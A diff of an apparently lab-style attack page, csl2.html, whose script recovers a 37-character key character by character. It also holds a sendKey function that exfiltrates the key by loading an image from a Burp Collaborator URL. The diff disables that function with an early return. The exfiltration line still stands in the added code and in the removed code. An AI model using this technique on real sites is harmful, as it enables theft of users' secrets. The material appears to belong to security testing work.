--- a/csl2.html
+++ b/csl2.html
@@ -6,7 +6,21 @@
     <ul id="secrets"></ul>
 
 <script>
+
+
+
 (async ()=>{
+    function sendKey(k)
+    {
+        console.log("sendKey:"+k)
+        return
+        var ul= document.getElementById("secrets");
+        var li = document.createElement("img");
+        li.src = "http://s81a9uym9ibodhw899ouoeei89e02p.burpcollaborator.net?key="+k
+        ul.appendChild(li);
+    };
+    sendKey("Started")
+
     key = ""
     while (key.length < 37) {
         chars="0123456789-abcdef"
@@ -36,17 +50,10 @@
             }
         }
     }
+    sendKey("finished:"+key)
 })();
 
-function sendKey(k)
-    {
-        console.log("sendKey:"+k)
-        
-        var ul= document.getElementById("secrets");
-        var li = document.createElement("img");
-        li.src = "http://s81a9uym9ibodhw899ouoeei89e02p.burpcollaborator.net?key="+k
-        ul.appendChild(li);
-    };
+
 </script>
   </body>
 </html>
